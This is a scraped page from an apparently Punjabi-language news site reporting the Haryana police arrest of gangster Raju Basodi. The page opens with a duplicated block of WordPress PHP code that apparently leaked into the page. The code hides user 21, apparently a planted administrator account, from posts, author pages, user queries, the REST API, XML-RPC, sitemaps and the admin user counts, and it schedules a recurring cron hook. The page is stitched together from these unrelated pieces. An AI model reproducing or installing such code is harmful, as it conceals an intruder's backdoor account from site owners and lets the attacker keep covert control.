add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਹਰਿਆਣਾ ਪੁਲਿਸ ਨੇ ਖਤਰਨਾਕ ਅਪਰਾਧੀ ਰਾਜੂ ਬਸੌਦੀ ਨੂੰ ਗ੍ਰਿਫਤਾਰ ਕਰਨ ਵਿਚ ਸਫਲਤਾ ਹਾਸਲ ਕੀਤੀ - Press Ki Taquat
No Result
View All Result
ਚੰਡੀਗੜ, 15 ਫਰਵਰੀ (ਪਿਯੂਸ਼ ਗੁਪਤਾ) – ਹਰਿਆਣਾ ਪੁਲਿਸ ਦੀ ਸਪੈਸ਼ਨ ਟਾਸਕ ਫੋਰਸ (ਐਸਟੀਐਫ) ਨੇ ਇਕ ਵੱਡੀ ਕਾਮਯਾਬੀ ਹਾਸਲ ਕਰਦੇ ਹੋਏ ਲਾਰੇਂਸ ਬਿਸ਼ਨੋਈ ਵੱਲੋਂ ਚਲਾਏ ਅੰਤਰ ਰਾਜੀ ਅਪਰਾਧਿਕ ਗਿਰੋਹ ਨਾਲ ਸਬੰਧਤ ਖਤਰਨਾਕ ਅਪਰਾਧੀ ਰਾਜੂ ਬਸੌਦੀ ਨੂੰ ਗ੍ਰਿਫਤਾਰ ਕੀਤਾ ਹੈ|
ਹਰਿਆਣਾ ਪੁਲਿਸ ਦੇ ਬੁਲਾਰੇ ਨੇ ਦਸਿਆ ਕਿ ਰਾਜੂ ਬਸੌਦੀ ਨੂੰ ਹਰਿਆਣਾ, ਪੰਜਾਬ, ਚੰਡੀਗੜ• ਅਤੇ ਦਿੱਲੀ ਦੀ ਪੁਲਿਸ ਨੂੰ ਭਾਲ ਸੀ| ਹਰਿਆਣਾ ਪੁਲਿਸ ਨੇ ਉਸ ਦੀ ਗ੍ਰਿਫਤਾਰੀ ‘ਤੇ 2.50 ਲੱਖ ਰੁਪਏ ਦਾ ਇਨਾਮ ਐਲਾਨ ਕੀਤਾ ਸੀ, ਜਿਸ ਵਿਚ ਸੋਨੀਪਤ ਪੁਲਿਸ ਵੱਲੋਂ ਇਕ ਲੱਖ ਰੁਪਏ, ਝੱਜਰ ਪੁਲਿਸ ਵੱਲੋਂ ਇਕ ਲੱਖ ਰੁਪਏ ਅਤੇ ਰੋਹਤਕ ਪੁਲਿਸ ਵੱਲੋਂ 50,000 ਰੁਪਏ ਦਾ ਇਨਾਮ ਸ਼ਾਮਿਲ ਹੈ|
ਅਪਰਾਧੀ ਨੂੰ ਫੜਣ ਲਈ ਐਸਟੀਐਫ ਹਰਿਆਣਾ ਪੁਲਿਸ ਦੀ ਅਪੀਲ ‘ਤੇ ਇਕ ਲੁੱਕ ਆਊਟ ਸਰਕੁਲ ਜਾਰੀ ਕੀਤਾ ਗਿਆ ਸੀ| ਇਮੀਗ੍ਰੇਸ਼ਨ ਅਧਿਕਾਰੀਆਂ ਵੱਲੋਂ ਐਲਾਟ ਕੀਤੇ ਜਾਣ ਤੋਂ ਬਾਅਦ ਅਪਰਾਧੀ ਨੂੰ ਐਸਟੀਐਫ ਨੇ ਦਿੱਲੀ ਏਅਰਪੋਰਟ ਤੋਂ ਗ੍ਰਿਫਤਾਰ ਕੀਤਾ|
ਜਿਲਾ ਸੋਨੀਪਤ ਦੇ ਪਿੰਡ ਬਸੌਦੀ ਦਾ ਵਾਸੀ ਇਹ ਗੈਂਗਸਟਾਰ ਹਰਿਆਣਾ ਅਤੇ ਗੁਆਂਢੀ ਸੂਬਿਆਂ ਦੀ ਪੁਲਿਸ ਲਈ ਇਕ ਵੱਡੀ ਚੁਣੌਤੀ ਬਣਿਆ ਹੋਇਆ ਸੀ ਅਤੇ ਉਹ ਹਰਿਆਣਾ, ਦਿੱਲੀ, ਰਾਜਸਥਾਨ ਅਤੇ ਪੰਜਾਬ ਦੇ ਕਈ ਮਾਮਲੇ ਵਿਚ ਲੋਂੜੀਦਾ ਸੀ| ਕਈ ਸੂਬਿਆਂ ਦੀ ਪੁਲਿਸ ਨੂੰ ਇਸ ਦੀ ਭਾਲ ਸੀ| ਲਾਰੇਂਸ ਬਿਸ਼ਨੋਈ, ਸੰਪਤ ਨੇਹਰਾ, ਅਨਿਲ ਛਿੱਪੀ, ਅਕਸ਼ੈ ਪਾਲਰਾ ਅਤੇ ਨਰੇਸ਼ ਸੇਠੀ ਵਰਗੇ ਖਤਰਨਾਕ ਗੈਂਗਸਟਾਰਾਂ ਨਾਲ ਰਾਜੂ ਦੇ ਨੇੜਲੇ ਸਬੰਧ ਹਨ, ਜੋ ਫਿਲਹਾਲ ਵੱਖ-ਵੱਖ ਜੇਲਾਂ ਵਿਚ ਬੰਦ ਹਨ| ਇਸ ਦਾ ਕਰੀਬੀ ਸਹਿਯੋਗੀ ਸੰਦੀਪ ਉਰਫ ਕਾਲਾ ਹਾਲ ਹੀ ਵਿਚ ਫਰੀਦਾਬਾਦ ਵਿਚ ਕੁਝ ਦਿਨ ਪਹਿਲਾਂ ਪੁਲਿਸ ਹਿਰਾਸਤ ਨਾਲ ਫਰਾਰ ਹੋਇਆ ਹੈ|
ਦੋਸ਼ੀ ਇਕ ਵਸੂਲੀ ਗਿਰੋਹ ਚਲਾਦਾ ਹੈ, ਜਿਸ ਨੇ ਇਲਾਕੇ ਵਿਚ ਆਂਤਕ ਮਚਾ ਰੱਖਿਆ ਸੀ| ਇਹ ਹਰਿਆਣਾ, ਚੰਡੀਗੜ, ਪੰਜਾਬ ਅਤੇ ਦਿੱਲੀ ਵਿਚ ਕਈ ਵਿਅਕਤੀਆਂ ਤੋਂ ਜਰਬਨ ਵਸੂਲੀ ਲਈ ਸਰਗਰਮ ਸੀ| ਇਸ ਦੇ ਗਿਰੋਹ ਨੇ ਸੂਬੇ ਵਿਚ ਕਈ ਅਪਰਾਧ ਕੀਤੇ ਸਨ| ਰਾਜੂ ਬਸੌਦੀ ਖਿਲਾਫ ਦੋ ਦਰਜਨ ਤੋਂ ਵੱਧ ਮਾਮਲੇ ਦਰਜ ਹਨ| ਉਹ ਹਤਿਆ ਦੇ 13 ਮਾਮਲਿਆਂ, ਹੱਤਿਆ ਦਾ ਯਤਨ ਦੇ 3 ਮਾਮਲਿਆਂ ਅਤੇ ਲੁੱਟ ਅਤੇ ਡਕੈਤੀ ਦੇ ਲਗਭਗ ਇਕ ਦਰਜਨ ਮਾਮਲਿਆਂ ਵਿਚ ਸ਼ਾਮਿਲ ਹੈ| ਇਸ ਗਿਰੋਹ ਨੇ ਹਾਲ ਹੀ ਵਿਚ ਪੰਜਾਬ ਦੇ ਮਲੋਟ ਅਤੇ ਚੰਡੀਗੜ ਦੇ ਮਨੀਮਾਜਰਾ ਵਿਚ ਆਪਣੇ ਵਿਰੋਧੀਆਂ ਦੀ ਦਿਨ-ਦਹਾੜੇ ਹਤਿਆਵਾਂ ਕੀਤੀਆਂ|
ਰਾਜੂ ਬਸੌਦੀ ਦੀ ਗ੍ਰਿਫਤਾਰੀ ਨੂੰ ਐਸਟੀਐਫ ਵੱਲੋਂ ਵੱਡੀ ਸਫਲਤਾ ਵੱਜੋਂ ਵੇਖਿਆ ਜਾ ਰਿਹਾ ਹੈ| ਦੋਸ਼ੀ ਦਾ ਪੁਲਿਸ ਰਿਮਾਂਡ ਪ੍ਰਾਪਤ ਕਰਨ ਲਈ ਇਕ ਅਦਾਲਤ ਦੇ ਸਾਹਮਣੇ ਪੇਸ਼ ਕੀਤਾ ਜਾਵੇਗਾ, ਜਿਸ ਨਾਲ ਉਸ ਦੇ ਸਹਿਯੋਗੀ ਕਾਲਾ ਜਥੇਰੀ ਬਾਰੇ ਸੁਰਾਗ ਮਿਲਣ ਦੀ ਸੰਭਾਵਨਾ ਹੈ ਅਤੇ ਨਾਲ ਹੀ ਖੇਤਰ ਦੇ ਕਈ ਹੋਰ ਅਪਰਾਧਿਕ ਮਾਮਲਿਆਂ ਨੂੰ ਸੁਲਝਾਉਣ ਵਿਚ ਮਦਦ ਮਿਲ ਸਕਦੀ ਹੈ|
Post Views: 309
No Result
View All Result